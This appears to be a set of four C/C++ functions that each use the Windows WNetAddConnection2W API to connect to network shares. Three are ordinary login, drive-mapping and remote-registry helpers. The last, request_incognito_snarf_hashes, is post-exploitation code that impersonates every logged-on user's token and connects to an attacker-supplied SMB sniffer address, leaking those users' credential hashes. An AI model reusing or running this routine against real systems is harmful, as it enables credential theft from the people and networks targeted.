oslSecurityError SAL_CALL osl_loginUserOnFileServer(rtl_uString *strUserName, rtl_uString *strPasswd, rtl_uString *strFileServer, oslSecurity *pSecurity) { oslSecurityError ret; DWORD err; NETRESOURCEW netResource; sal_Unicode* remoteName; sal_Unicode* userName; remoteName = malloc((rtl_uString_getLength(strFileServer) + rtl_uString_getLength(strUserName) + 4) * sizeof(sal_Unicode)); userName = malloc((rtl_uString_getLength(strFileServer) + rtl_uString_getLength(strUserName) + 2) * sizeof(sal_Unicode)); wcscpy(remoteName, L"\\\\"); wcscat(remoteName, rtl_uString_getStr(strFileServer)); wcscat(remoteName, L"\\"); wcscat(remoteName, rtl_uString_getStr(strUserName)); wcscpy(userName, rtl_uString_getStr(strFileServer)); wcscat(userName, L"\\"); wcscat(userName, rtl_uString_getStr(strUserName)); netResource.dwScope = RESOURCE_GLOBALNET; netResource.dwType = RESOURCETYPE_DISK; netResource.dwDisplayType = RESOURCEDISPLAYTYPE_SHARE; netResource.dwUsage = RESOURCEUSAGE_CONNECTABLE; netResource.lpLocalName = NULL; netResource.lpRemoteName = remoteName; netResource.lpComment = NULL; netResource.lpProvider = NULL; err = WNetAddConnection2W(&netResource, rtl_uString_getStr(strPasswd), userName, 0); if ((err == NO_ERROR) || (err == ERROR_ALREADY_ASSIGNED)) { oslSecurityImpl* pSecImpl = malloc(sizeof(oslSecurityImpl)); pSecImpl->m_pNetResource = malloc(sizeof(NETRESOURCE)); *pSecImpl->m_pNetResource = netResource; pSecImpl->m_hToken = NULL; pSecImpl->m_hProfile = NULL; wcscpy(pSecImpl->m_User, rtl_uString_getStr(strUserName)); *pSecurity = (oslSecurity)pSecImpl; ret = osl_Security_E_None; } else ret = osl_Security_E_UserUnknown; free(remoteName); free(userName); return ret; }
bool DriveMapping::DoMapping() { wchar_t drvTemplate[] = L" :"; NETRESOURCEW netRes = {0}; netRes.dwType = RESOURCETYPE_DISK; netRes.lpLocalName = drvTemplate; netRes.lpRemoteName = mRemoteUNCPath.BeginWriting(); wchar_t driveLetter = L'D'; DWORD result = NO_ERROR; do { drvTemplate[0] = driveLetter; result = WNetAddConnection2W(&netRes, nullptr, nullptr, CONNECT_TEMPORARY); } while (result == ERROR_ALREADY_ASSIGNED && ++driveLetter <= L'Z'); if (result != NO_ERROR) { return false; } mDriveLetter = driveLetter; return true; }
BOOL MRegistryBase::ConnectRemote(LPCWSTR asServer, LPCWSTR asLogin /*= NULL*/, LPCWSTR asPassword /*= NULL*/, LPCWSTR asResource /*= NULL*/) { if (!asServer || !*asServer) { InvalidOp(); return FALSE; } // Сначала отключиться, если было другое подключение ConnectLocal(); while (*asServer == L'\\' || *asServer == '/') asServer++; // The name of the remote computer. The string has the following form: \\computername if (asServer[0]) { sRemoteServer[0] = sRemoteServer[1] = L'\\'; lstrcpynW(sRemoteServer+2, asServer, countof(sRemoteServer)-2); if (asLogin && *asLogin && asPassword) { NETRESOURCEW res = {0}; _ASSERTE(countof(sRemoteResource) > countof(sRemoteServer)); if (asResource && asResource[0] == L'\\' && asResource[1] == L'\\') { lstrcpynW(sRemoteResource, asResource, countof(sRemoteResource)); } else { lstrcpynW(sRemoteResource, sRemoteServer, countof(sRemoteResource)); if (asResource && asResource[0] == L'\\') { lstrcatW(sRemoteResource, asResource); } else { lstrcatW(sRemoteResource, L"\\"); if (asResource && *asResource) lstrcatW(sRemoteResource, asResource); else lstrcatW(sRemoteResource, L"IPC$"); } } res.dwType = RESOURCETYPE_ANY; res.lpRemoteName = sRemoteResource; // Подключаемся CScreenRestore pop(GetMsg(REM_RemoteConnecting), GetMsg(REPluginName)); DWORD dwErr = WNetAddConnection2W(&res, asPassword, asLogin, CONNECT_TEMPORARY); pop.Restore(); if (dwErr != 0) { REPlugin::MessageFmt(REM_LogonFailed, asLogin, dwErr, _T("RemoteConnect")); return FALSE; } } else { sRemoteResource[0] = 0; } } bRemote = true; return TRUE; }
// Send off hashes for all tokens to IP address with SMB sniffer running DWORD request_incognito_snarf_hashes(Remote *remote, Packet *packet) { DWORD num_tokens = 0, i; SavedToken *token_list = NULL; NETRESOURCEW nr; HANDLE saved_token; TOKEN_PRIVS token_privs; wchar_t conn_string[BUF_SIZE] = L"", domain_name[BUF_SIZE] = L"", return_value[BUF_SIZE] = L"", temp[BUF_SIZE] = L""; Packet *response = packet_create_response(packet); char *smb_sniffer_ip = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_SERVERNAME); // Initialise net_resource structure (essentially just set ip to that of smb_sniffer) if (_snwprintf(conn_string, BUF_SIZE, L"\\\\%s", smb_sniffer_ip) == -1) { conn_string[BUF_SIZE - 1] = '\0'; } nr.dwType = RESOURCETYPE_ANY; nr.lpLocalName = NULL; nr.lpProvider = NULL; nr.lpRemoteName = conn_string; // Save current thread token if one is currently being impersonated if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &saved_token)) saved_token = INVALID_HANDLE_VALUE; token_list = get_token_list(&num_tokens, &token_privs); if (!token_list) { packet_transmit_response(GetLastError(), remote, response); goto cleanup; } // Use every token and get hashes by connecting to SMB sniffer for (i = 0; i < num_tokens; i++) { if (token_list[i].token) { get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE); // If token is not "useless" local account connect to sniffer // XXX This may need some expansion to support other languages if (_wcsicmp(domain_name, L"NT AUTHORITY")) { // Impersonate token ImpersonateLoggedOnUser(token_list[i].token); // Cancel previous connection to ensure hashes are sent and existing connection isn't reused WNetCancelConnection2W(nr.lpRemoteName, 0, TRUE); // Connect to smb sniffer if (!WNetAddConnection2W(&nr, NULL, NULL, 0)) { // Revert to primary token RevertToSelf(); } } CloseHandle(token_list[i].token); } } packet_transmit_response(ERROR_SUCCESS, remote, response); cleanup: free(token_list); // Restore token impersonation if (saved_token != INVALID_HANDLE_VALUE) { ImpersonateLoggedOnUser(saved_token); } return ERROR_SUCCESS; }